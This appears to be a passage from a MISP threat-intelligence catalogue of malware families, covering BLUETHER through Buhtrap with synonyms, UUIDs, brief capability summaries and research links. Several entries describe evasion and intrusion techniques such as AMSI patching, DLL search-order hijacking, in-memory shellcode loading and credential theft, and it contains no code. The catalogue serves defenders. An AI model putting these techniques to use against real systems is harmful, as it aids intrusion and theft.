- https://unit42.paloaltonetworks.com/bluesky-ransomware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BLUETHER
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BLUETHER.
Known Synonyms |
---|
CAPGELD |
Internal MISP references
UUID cf542e2d-531c-4d34-98c8-7e3cb26a32af
which can be used as unique global reference for BLUETHER
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bluether - webarchive
- https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf - webarchive
- https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BluStealer
Avast describes this malware as a recombination of other malware including SpyEx, ThunderFox, ChromeRecovery, StormKitty, and firepwd.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BluStealer.
Known Synonyms |
---|
a310logger |
Internal MISP references
UUID cb4bfed3-3042-4a29-a72d-c8b5c510faea
which can be used as unique global reference for BluStealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.blustealer - webarchive
- https://decoded.avast.io/anhho/blustealer/ - webarchive
- https://blogs.blackberry.com/en/2021/10/threat-thursday-blustealer-infostealer - webarchive
- https://blog.minerva-labs.com/a-new-blustealer-loader-uses-direct-syscalls-to-evade-edrs - webarchive
- https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord - webarchive
- https://www.gosecure.net/blog/2021/09/22/gosecure-titan-labs-technical-report-blustealer-malware-threat/ - webarchive
- https://twitter.com/GoSecure_Inc/status/1437435265350397957 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BMANAGER
Internal MISP references
UUID c26b2dd3-4641-4174-977d-6813f2181a05
which can be used as unique global reference for BMANAGER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BOATLAUNCH
FIN7 uses this malware as a helper module during intrusion operations. BOATLAUNCH continuously looks for PowerShell processes on infected systems and patches them to bypass the Windows Antimalware Scan Interface (AMSI).
Internal MISP references
UUID 13e62fe0-af0e-4a44-8437-ed86101f12d4
which can be used as unique global reference for BOATLAUNCH
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Boaxxe
Internal MISP references
UUID 2f11eb73-4faa-48c5-b217-11e139962c6f
which can be used as unique global reference for Boaxxe
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bobik
This malware offers remote access capabilities but also has a DDoS module that was used against supporters of Ukraine.
Internal MISP references
UUID 71a2182f-1010-496d-8c20-7a60639adff1
which can be used as unique global reference for Bobik
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BockLit
According to Trend Micro, this is a ransomware written in Go, targeting Windows and macOS environments, that tries to disguise itself as LockBit by changing the wallpaper to a LockBit 2 screen. Most of the samples contained hard-coded AWS credentials, and the stolen data was uploaded to an Amazon S3 bucket controlled by the threat actor.
Internal MISP references
UUID a7863070-0dd0-4176-8ab8-4630ef615c0f
which can be used as unique global reference for BockLit
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bohmini
Internal MISP references
UUID 444ca9d1-7128-40fa-9665-654194dfbe0b
which can be used as unique global reference for Bohmini
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BOLDMOVE (Windows)
According to Mandiant, this malware family is attributed to a potential Chinese background, and its Linux variant is related to the exploitation of Fortinet's SSL-VPN (CVE-2022-42475).
Internal MISP references
UUID 4212b386-b6de-4b06-86f1-ba20b5c01447
which can be used as unique global reference for BOLDMOVE (Windows)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bolek
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Bolek.
Known Synonyms |
---|
KBOT |
Internal MISP references
UUID d3af810f-e657-409c-b821-4b1cf727ad18
which can be used as unique global reference for Bolek
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BookCodes RAT
BookCodesRAT is a remote access trojan that uses HTTP(S) for communication. It supports around 25 commands that include operations on the victim's filesystem, basic process management, and the download and execution of additional tools from the attacker's arsenal. The commands are indexed by 32-bit integers, starting with the value 0x97853646.
BookCodesRAT uses mostly compromised South Korean web servers for the C&C traffic and is usually deployed against South Korean targets.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BookCodes RAT.
Known Synonyms |
---|
BookCodesTea |
Internal MISP references
UUID 433b9a1c-dd2a-4d2b-b469-47b40fc6c196
which can be used as unique global reference for BookCodes RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bookcodesrat - webarchive
- https://www.welivesecurity.com/2020/11/16/lazarus-supply-chain-attack-south-korea/ - webarchive
- https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/ - webarchive
- https://vblocalhost.com/uploads/VB2021-Lee-etal.pdf - webarchive
- https://www.boho.or.kr/filedownload.do?attach_file_seq=2612&attach_file_id=EpF2612.pdf - webarchive
- https://vblocalhost.com/uploads/VB2021-Park.pdf - webarchive
- https://www.boho.or.kr/filedownload.do?attach_file_seq=2452&attach_file_id=EpF2452.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Book of Eli
This malware, written in .NET, is a classic information stealer. It can collect various information and can be deployed in different configurations: "The full-featured version of the malware can log keystrokes, collect profile files of Mozilla Firefox and Google Chrome browsers, record sound from the microphone, grab desktop screenshots, capture photo from the webcam, and collect information about the version of the operation system and installed anti-virus software." (ESET) This malware has been active since at least 2012.
Internal MISP references
UUID 2029a6f7-f98e-4582-bc5b-7ff0188f1af2
which can be used as unique global reference for Book of Eli
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bookworm
Internal MISP references
UUID 1b8cfb29-7a63-459a-bc90-c9ea3634b21c
which can be used as unique global reference for Bookworm
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BOOMBOX
Internal MISP references
UUID e8112e1a-4fda-4857-8df8-0ba7fb5ea1ba
which can be used as unique global reference for BOOMBOX
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.boombox - webarchive
- https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/ - webarchive
- https://cert.pl/posts/2023/04/kampania-szpiegowska-apt29/ - webarchive
- https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf - webarchive
- https://www.incibe.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf - webarchive
- https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BOOSTWRITE
FireEye describes BOOSTWRITE as a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate ‘Dwrite.dll’ provided by the Microsoft DirectX Typography Services. The application loads the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads ‘Dwrite’. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.
Internal MISP references
UUID a24eb119-d526-4aa4-ab5f-171ccddd4fbc
which can be used as unique global reference for BOOSTWRITE
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.boostwrite - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BOOTWRECK
BOOTWRECK is a master boot record wiper malware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BOOTWRECK.
Known Synonyms |
---|
MBRkiller |
Internal MISP references
UUID 174b9314-765e-44d0-a761-10d352f4466c
which can be used as unique global reference for BOOTWRECK
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Borat RAT
The Borat RAT comes bundled with its components (e.g. binary builder, supporting modules, server certificates). According to Cyble, this malware is a unique combination of RAT, spyware, and ransomware. The supporting modules are included; a few of the capabilities are keylogging, ransomware, audio/webcam recording, process hollowing, and browser credential/Discord token stealing.
Internal MISP references
UUID 7ff0b462-c5be-40fa-82da-7efe93722f92
which can be used as unique global reference for Borat RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.boratrat - webarchive
- https://blogs.blackberry.com/en/2022/04/threat-thursday-boratrat - webarchive
- https://www.bleepingcomputer.com/news/security/new-borat-remote-access-malware-is-no-laughing-matter/ - webarchive
- https://blog.cyble.com/2022/03/31/deep-dive-analysis-borat-rat/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Borr
Internal MISP references
UUID e016e652-8d02-45c4-a268-fe4c588ebd3d
which can be used as unique global reference for Borr
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BottomLoader
Internal MISP references
UUID 450133c9-b40c-4526-a669-5d5cc55276d5
which can be used as unique global reference for BottomLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bouncer
Internal MISP references
UUID 80487bca-7629-4cb2-bf5b-993d5568b699
which can be used as unique global reference for Bouncer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BoxCaon
According to Checkpoint Research, this malware family has the ability to download and upload files, run commands and send the attackers the results. It has been observed being used by threat actor IndigoZebra.
Internal MISP references
UUID 5ccb9d4c-bb9b-48ee-9ea3-a64a81eb210f
which can be used as unique global reference for BoxCaon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bozok
Internal MISP references
UUID f9d0e934-879c-4668-b959-6bf7bdc96f5d
which can be used as unique global reference for Bozok
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok - webarchive
- https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe - webarchive
- https://securelist.com/apt-trends-report-q1-2021/101967/ - webarchive
- https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BRAIN
Internal MISP references
UUID 1619ee64-fc54-47c0-8ee1-8b786fefc0fd
which can be used as unique global reference for BRAIN
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Brambul
Brambul is a worm that spreads by using a list of hard-coded login credentials to launch a brute-force password attack against the SMB protocol to gain access to a victim's networks.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Brambul.
Known Synonyms |
---|
SORRYBRUTE |
Internal MISP references
UUID d97ae60e-612a-4feb-908a-8c4d32e9d763
which can be used as unique global reference for Brambul
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul - webarchive
- https://swanleesec.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-2 - webarchive
- https://www.us-cert.gov/ncas/alerts/TA18-149A - webarchive
- https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1 - webarchive
- https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-2 - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://www.secureworks.com/research/threat-profiles/nickel-academy - webarchive
- https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/ - webarchive
- https://www.us-cert.gov/ncas/analysis-reports/AR18-149A - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://swanleesec.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1 - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BravoNC
Internal MISP references
UUID fbed27da-551d-4793-ba7e-128256326909
which can be used as unique global reference for BravoNC
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BrbBot
Internal MISP references
UUID b9a4455a-ad55-4858-9017-bb73a8640045
which can be used as unique global reference for BrbBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BreachRAT
This is a backdoor which FireEye calls the Breach Remote Administration Tool (BreachRAT), written in C++. The malware name is derived from the hardcoded PDB path found in the RAT: C:\Work\Breach Remote Administration Tool\Release\Client.pdb
Internal MISP references
UUID 52cf2986-89e8-463d-90b6-e4356c9777e7
which can be used as unique global reference for BreachRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Breakthrough
There is no reference available for this family, and all known samples have version 1.0.0.
PDB strings in the samples suggest that this is an "exclusive" loader, possibly known as "breakthrough", e.g. C:\Users\Exclusiv\Desktop\хп-пробив\Release\build.pdb
The communication URL parameters are fairly unique in this combination:
gate.php?hwid=
Internal MISP references
UUID a05b8e4b-a686-439f-8094-037fbcda52bd
which can be used as unique global reference for Breakthrough
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bredolab
Internal MISP references
UUID 55d343a1-7e80-4254-92eb-dfb433b91a90
which can be used as unique global reference for Bredolab
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bredolab - webarchive
- https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html - webarchive
- https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf - webarchive
- https://securelist.com/end-of-the-line-for-the-bredolab-botnet/36335/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BrittleBush
Internal MISP references
UUID fd4665b8-59b6-427f-a22d-bb3b50e9e176
which can be used as unique global reference for BrittleBush
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BROKEYOLK
According to Mandiant, BROKEYOLK is a .NET downloader that downloads and executes a file from a hard-coded command and control (C2) server. The malware communicates via SOAP (Simple Object Access Protocol) requests using HTTP.
Internal MISP references
UUID dd19501d-c23e-4a52-8cef-726a8483d6c2
which can be used as unique global reference for BROKEYOLK
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BROLER
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BROLER.
Known Synonyms |
---|
down_new |
Internal MISP references
UUID 9a544700-13e3-490f-ae4e-45b3fd159546
which can be used as unique global reference for BROLER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Broomstick
Oyster is a backdoor malware written in C++, first appearing in July 2023. It allows for remote sessions, supporting tasks like file transfer and command-line processing. This malware has been used by numerous threat actors as a tool to support ransomware intrusions. Oyster has most likely been distributed through various methods, as suggested by the build identifiers in examined samples. Additionally, Oyster is capable of collecting basic system data and communicates with a command-and-control (C2) server. It can execute commands via cmd.exe and run additional files.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Broomstick.
Known Synonyms |
---|
CLEANBOOST |
CleanUp |
CleanUpLoader |
Oyster |
Internal MISP references
UUID 10072fed-e5ef-4c97-9fe8-ca33f1e0b1f6
which can be used as unique global reference for Broomstick
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.broomstick - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2024-1009.pdf - webarchive
- https://symantec-enterprise-blogs.security.com/threat-intelligence/malware-ai-llm - webarchive
- https://exchange.xforce.ibmcloud.com/malware-analysis/guid:2f96dded08ec1c2dd039fca21378050c - webarchive
- https://www.rapid7.com/blog/post/2024/06/17/malvertising-campaign-leads-to-execution-of-oyster-backdoor/ - webarchive
- https://hunt.io/blog/a-simple-approach-to-discovering-oyster-backdoor-infrastructure - webarchive
- https://exchange.xforce.ibmcloud.com/malware-analysis/guid:df2b52d89c5c0edfdf7bdaa6f67dd714 - webarchive
- https://www.threatdown.com/blog/rhysida-using-oyster-backdoor-to-deliver-ransomware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bruh Wiper
Internal MISP references
UUID 33b76b3f-7056-4892-a134-6e984f500c3c
which can be used as unique global reference for Bruh Wiper
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BrushaLoader
Internal MISP references
UUID 75a03c4f-8a97-4fc0-a69e-b2e73e4564fc
which can be used as unique global reference for BrushaLoader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.brushaloader - webarchive
- https://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/brushaloader-still-sweeping-victims-one-year-later - webarchive
- https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Brute Ratel C4
Brute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment. This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Brute Ratel C4.
Known Synonyms |
---|
BOLDBADGER |
BruteRatel |
Internal MISP references
UUID 19e4df44-d469-4903-8999-22d650a21dd7
which can be used as unique global reference for Brute Ratel C4
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4 - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v - webarchive
- https://0xdarkvortex.dev/hiding-in-plainsight/ - webarchive
- https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/ - webarchive
- https://cybergeeks.tech/a-deep-dive-into-brute-ratel-c4-payloads/ - webarchive
- https://blog.spookysec.net/analyzing-brc4-badgers/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf - webarchive
- https://web.archive.org/web/20230216110153/https://yoroi.company/research/hunting-cyber-evil-ratels-from-the-targeted-attacks-to-the-widespread-usage-of-brute-ratel/ - webarchive
- https://bruteratel.com/research/feature-update/2021/06/01/PE-Reflection-Long-Live-The-King/ - webarchive
- https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html - webarchive
- https://twitter.com/MichalKoczwara/status/1652067563545800705 - webarchive
- https://medium.com/walmartglobaltech/brute-ratel-config-decoding-update-7820455022cb - webarchive
- https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/ - webarchive
- https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing - webarchive
- https://blog.reveng.ai/latrodectus-distribution-via-brc4/ - webarchive
- https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f - webarchive
- https://blog.krakz.fr/articles/latrodectus/ - webarchive
- https://www.splunk.com/en_us/blog/security/deliver-a-strike-by-reversing-a-badger-brute-ratel-detection-and-analysis.html - webarchive
- https://cybergeeks.tech/a-deep-dive-into-brute-ratel-c4-payloads-part-2/ - webarchive
- https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/ - webarchive
- https://socradar.io/brute-ratel-utilized-by-threat-actors-in-new-ransomware-operations/ - webarchive
- https://twitter.com/embee_research/status/1580030303950995456?s=20&t=0vfXnrCXaVSX-P-hiSrFwA - webarchive
- https://andreafortuna.org/2023/02/23/how-to-detect-brute-ratel-activities - webarchive
- https://www.protect.airbus.com/blog/incident-response-analysis-of-recent-version-of-brc4/ - webarchive
- https://www.youtube.com/watch?v=a7W6rhkpVSM - webarchive
- https://protectedmo.de/brute.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BrutPOS
Internal MISP references
UUID e413c33a-badd-49a1-8d44-c9a0983b5151
which can be used as unique global reference for BrutPOS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BS2005
Internal MISP references
UUID 35e00ff0-704e-4e61-b9bb-9ed20a4a008f
which can be used as unique global reference for BS2005
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005 - webarchive
- https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/ - webarchive
- https://github.com/nccgroup/Royal_APT - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-palace - webarchive
- https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BTCWare
According to PCRisk, BTCWare is an updated version of a ransomware-type virus called Crptxxx. This ransomware is distributed via a malicious application called "Rogers Hi-Speed Internet". Once it has infiltrated a system, BTCWare encrypts files and appends the ".btcware" extension to filenames. Newer variants of this ransomware append the .shadow, .payday, .wyvern, .nuclear, .aleta, .gryphon, .nopasaran, .blocking, .xfile, .master, .onyon, .theva, .cryptobyte or .cryptowin extensions to encrypted files. BTCWare then creates an HTM file ("#HOW_TO_FIX!.hta.htm") and places it on the desktop. Other variants of this ransomware use the file !#RESTORE_FILES#!.inf to store their ransom-demanding message.
Internal MISP references
UUID d29786c6-2cc0-4e2f-97b0-242a1d9e9bf8
which can be used as unique global reference for BTCWare
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BUBBLEWRAP
BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities.
Internal MISP references
UUID d114ee6c-cf7d-408a-8077-d59e736f5a66
which can be used as unique global reference for BUBBLEWRAP
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Buer
Buer is a downloader sold on underground forums and used by threat actors to deliver payload malware onto target machines. It has been observed in email campaigns and has been sold as a service since August 2019.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Buer.
Known Synonyms |
---|
Buerloader |
RustyBuer |
Internal MISP references
UUID b908173c-c89e-400e-b69d-da411120dae2
which can be used as unique global reference for Buer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.buer - webarchive
- https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/ - webarchive
- https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/ - webarchive
- https://twitter.com/StopMalvertisin/status/1182505434231398401 - webarchive
- https://labs.vipre.com/buer-loader-found-in-an-unusual-email-attachment/ - webarchive
- https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/ - webarchive
- https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/ - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-symphony - webarchive
- https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/ - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html - webarchive
- https://www.fortinet.com/blog/threat-research/signed-sealed-and-delivered-signed-xll-file-delivers-buer-loader - webarchive
- https://blog.group-ib.com/prometheus-tds - webarchive
- https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://blog.minerva-labs.com/stopping-buerloader - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://krabsonsecurity.com/2019/12/05/buer-loader-new-russian-loader-on-the-market-with-interesting-persistence/ - webarchive
- https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/ - webarchive
- https://tehtris.com/en/blog/buer-loader-analysis-a-rusted-malware-program - webarchive
- https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://www.proofpoint.com/us/threat-insight/post/buer-new-loader-emerges-underground-marketplace - webarchive
- https://twitter.com/SophosLabs/status/1321844306970251265 - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-blackburn - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/new-variant-buer-loader-written-rust - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf - webarchive
- https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf - webarchive
- https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/ - webarchive
- https://medium.com/walmartglobaltech/buerloader-updates-3e34c1949b96 - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware - webarchive
- https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/k/a-review-and-analysis-of-2021-buer-loader-campaigns/TechnicalBrief-An-Analysis-of-Buer-Loader.pdf - webarchive
- https://www.trendmicro.com/en_us/research/21/k/a-review-and-analysis-of-2021-buer-loader-campaigns.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BUFFETLINE
Internal MISP references
UUID eca37457-cdd4-44c7-ad07-7a4a863e8765
which can be used as unique global reference for BUFFETLINE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BUGHATCH
According to Elastic, BUGHATCH is an in-memory implant loaded by an obfuscated PowerShell script that decodes and executes an embedded shellcode blob in its allocated memory space using common Windows APIs (VirtualAlloc, CreateThread, WaitForSingleObject).
Internal MISP references
UUID d05f8cfe-ae3f-4468-9c48-90124b59ccda
which can be used as unique global reference for BUGHATCH
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
bugsleep
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular bugsleep.
Known Synonyms |
---|
MuddyRot |
Internal MISP references
UUID edbe6c15-6ce8-4927-9f74-0504f0711049
which can be used as unique global reference for bugsleep
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bugsleep - webarchive
- https://blog.sekoia.io/muddywater-replaces-atera-by-custom-muddyrot-implant-in-a-recent-campaign/ - webarchive
- https://nikhilh-20.github.io/blog/inject_bugsleep/ - webarchive
- https://research.checkpoint.com/2024/new-bugsleep-backdoor-deployed-in-recent-muddywater-campaigns/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Buhtrap
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Buhtrap.
Known Synonyms |
---|
Ratopak |
Internal MISP references
UUID fa278536-8293-4717-86b5-8a03aa11063f
which can be used as unique global reference for Buhtrap
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8e498912-44f8-4ea0-ac50-4544f0fedd6c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
